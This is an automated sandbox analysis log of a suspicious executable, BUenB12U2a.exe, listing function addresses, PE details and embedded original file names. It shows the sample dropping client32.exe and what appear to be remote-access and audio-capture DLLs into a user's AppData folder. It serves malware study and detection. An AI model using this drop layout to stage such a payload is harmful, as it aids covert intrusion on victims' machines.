                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBFE7F16_2_6CBFE7F1
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CB821F06_2_6CB821F0
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CB9A1DD6_2_6CB9A1DD
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBF41596_2_6CBF4159
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CB9828B6_2_6CB9828B
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBF22CD6_2_6CBF22CD
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBDA2776_2_6CBDA277
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CC182206_2_6CC18220
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CB9839B6_2_6CB9839B
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CC11CEF6_2_6CC11CEF
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CB99C8E6_2_6CB99C8E
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CB93DB16_2_6CB93DB1
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CB97D206_2_6CB97D20
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CB95E206_2_6CB95E20
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBDDF356_2_6CBDDF35
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBFF8BA6_2_6CBFF8BA
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBF98776_2_6CBF9877
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CC139686_2_6CC13968
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CC21AE06_2_6CC21AE0
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBDDA386_2_6CBDDA38
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CB93B1D6_2_6CB93B1D
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CC27B2A6_2_6CC27B2A
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBDD4FF6_2_6CBDD4FF
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBFD43B6_2_6CBFD43B
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CB935FA6_2_6CB935FA
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CB975C16_2_6CB975C1
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CC296A76_2_6CC296A7
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CB996C96_2_6CB996C9
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CB957956_2_6CB95795
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CC1D7546_2_6CC1D754
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBFB7236_2_6CBFB723
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBF31BA6_2_6CBF31BA
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBA911E6_2_6CBA911E
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CBF516D6_2_6CBF516D
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CC292956_2_6CC29295
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CB972106_2_6CB97210
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CCACD106_2_6CCACD10
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CC6C5F06_2_6CC6C5F0
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CD4C0A06_2_6CD4C0A0
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CC67B506_2_6CC67B50
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CC9B7006_2_6CC9B700
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CD8EC806_2_6CD8EC80
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CD92E456_2_6CD92E45
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CD54F106_2_6CD54F10
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CC488F06_2_6CC488F0
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CC704B06_2_6CC704B0
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CD8A4306_2_6CD8A430
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: 6_2_6CC825D06_2_6CC825D0
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeProcess token adjusted: SecurityJump to behavior
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: String function: 00007FFDFB12C17B appears 38 times
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: String function: 00007FFDFB12C181 appears 1188 times
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: String function: 00007FFDFB0B1325 appears 477 times
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: String function: 00007FF76CA12710 appears 104 times
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: String function: 00007FF76CA12910 appears 34 times
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: String function: 00007FFDFB12C931 appears 39 times
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: String function: 00007FFDFB12C93D appears 69 times
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: String function: 00007FFDFB12C265 appears 48 times
                                Source: C:\Users\user\Desktop\BUenB12U2a.exeCode function: String function: 00007FFDFB12C16F appears 335 times
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: String function: 6CC97830 appears 203 times
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: String function: 6C9958D0 appears 173 times
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: String function: 6C9B6AB0 appears 60 times
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: String function: 6CC67A10 appears 401 times
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: String function: 6C9A5BB0 appears 132 times
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: String function: 6CD73280 appears 271 times
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: String function: 6CB9B69A appears 61 times
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: String function: 6CC66040 appears 90 times
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: String function: 6CB90950 appears 151 times
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: String function: 6C9BC9F9 appears 33 times
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: String function: 6CB9A455 appears 39 times
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: String function: 6CB90934 appears 74 times
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: String function: 6C9A5940 appears 60 times
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: String function: 6C9A5B20 appears 35 times
                                Source: C:\Users\user\AppData\Roaming\extracted\client32.exeCode function: String function: 6C993050 appears 47 times
                                Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                                Source: api-ms-win-core-processenvironment-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-interlocked-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-util-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-stdio-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-processthreads-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-errorhandling-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-console-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-process-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-synch-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-timezone-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-file-l2-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-debug-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-string-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-handle-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-synch-l1-2-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-profile-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-localization-l1-2-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-datetime-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-math-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-locale-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-time-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-fibers-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-processthreads-l1-1-1.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-utility-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-namedpipe-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-filesystem-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-file-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-fibers-l1-1-1.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-kernel32-legacy-l1-1-1.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-conio-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-heap-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-sysinfo-l1-2-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-convert-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-runtime-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-string-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-file-l1-2-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-memory-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-sysinfo-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-libraryloader-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: python3.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-core-heap-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: api-ms-win-crt-environment-l1-1-0.dll.0.drStatic PE information: No import functions for PE file found
                                Source: BUenB12U2a.exe, 00000000.00000003.1718514366.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1714591412.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1717379256.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1715627674.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1714352809.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1716837900.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1717268731.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1713895799.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1717804451.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1718717319.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1715833362.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1731650891.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1715052639.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1716019575.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1717153712.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1716520545.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1714467439.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1718208410.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1719353500.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1713603744.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1717482852.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1718108034.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1713211636.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1718412389.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1715926087.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1717594095.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1715143617.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1715439018.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1714046977.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1715542957.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1715345292.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1717906121.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1732832574.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepython3.dll. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1718799711.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1719004065.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1716116780.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1715244071.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1714217793.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_elementtree.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1716319151.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1714671759.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1718008281.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1719242514.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1716720343.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1716221103.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1734934549.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1716414194.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1718897846.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1714954517.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1714813858.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1716627073.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1732651954.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepyexpat.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1718313895.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1715737864.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1718614963.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1734718819.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1717697238.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1719097973.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameapisetstubj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000000.00000003.1735406615.000001E234146000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exeBinary or memory string: OriginalFilename vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000002.2043004742.00007FFDFB09A000.00000002.00000001.01000000.00000010.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1792471952.0000020E47934000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepcicapi.dll. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.2010596571.0000020E478F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAudioCaptureWVI.dll0 vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000002.2048332628.00007FFE1332D000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000002.2031012733.0000020E46B20000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: OriginalFilenamepython3.dll. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000002.2048005767.00007FFE13306000.00000002.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1795311901.0000020E478F4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenametcctl32.dll. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1795696339.0000020E478BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepcichek.dll0 vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000002.2046711642.00007FFE10269000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.2013058865.0000020E470C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamekernel32j% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000002.2047788023.00007FFE130C6000.00000002.00000001.01000000.00000011.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1791653644.0000020E48128000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemsvcr100_clr0400.dll^ vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.2004945513.0000020E478F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAudioCaptureWVI.dll0 vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.2007202946.0000020E478F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAudioCaptureWVI.dll0 vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.2012237313.0000020E478FA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAudioCaptureWVI.dll0 vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000002.2047347592.00007FFE11EC5000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1792471952.0000020E4790C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepcicapi.dll. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1795250891.0000020E4793B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenametcctl32.dll. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1793871824.0000020E481E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepcicl32.dll. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1795311901.0000020E478C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepcichek.dll0 vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000002.2043368746.00007FFDFB16F000.00000002.00000001.01000000.0000000F.sdmpBinary or memory string: OriginalFilenamelibsslH vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000002.2045927086.00007FFDFB740000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamepython311.dll. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1795386408.0000020E480F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenametcctl32.dll. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1790436043.0000020E478F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclient32.exe. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000002.2046218284.00007FFDFB8A9000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenameucrtbase.dllj% vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1794261519.0000020E48A30000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepcicl32.dll. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000002.2041837850.00007FFDFABA5000.00000002.00000001.01000000.00000013.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.2010748148.0000020E478F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAudioCaptureWVI.dll0 vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.1790971677.0000020E4793A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamehtctl32.dll. vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000003.2009351645.0000020E478F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAudioCaptureWVI.dll0 vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000002.2048783313.00007FFE1A479000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs BUenB12U2a.exe
                                Source: BUenB12U2a.exe, 00000001.00000002.2047109613.00007FFE11522000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs BUenB12U2a.exe
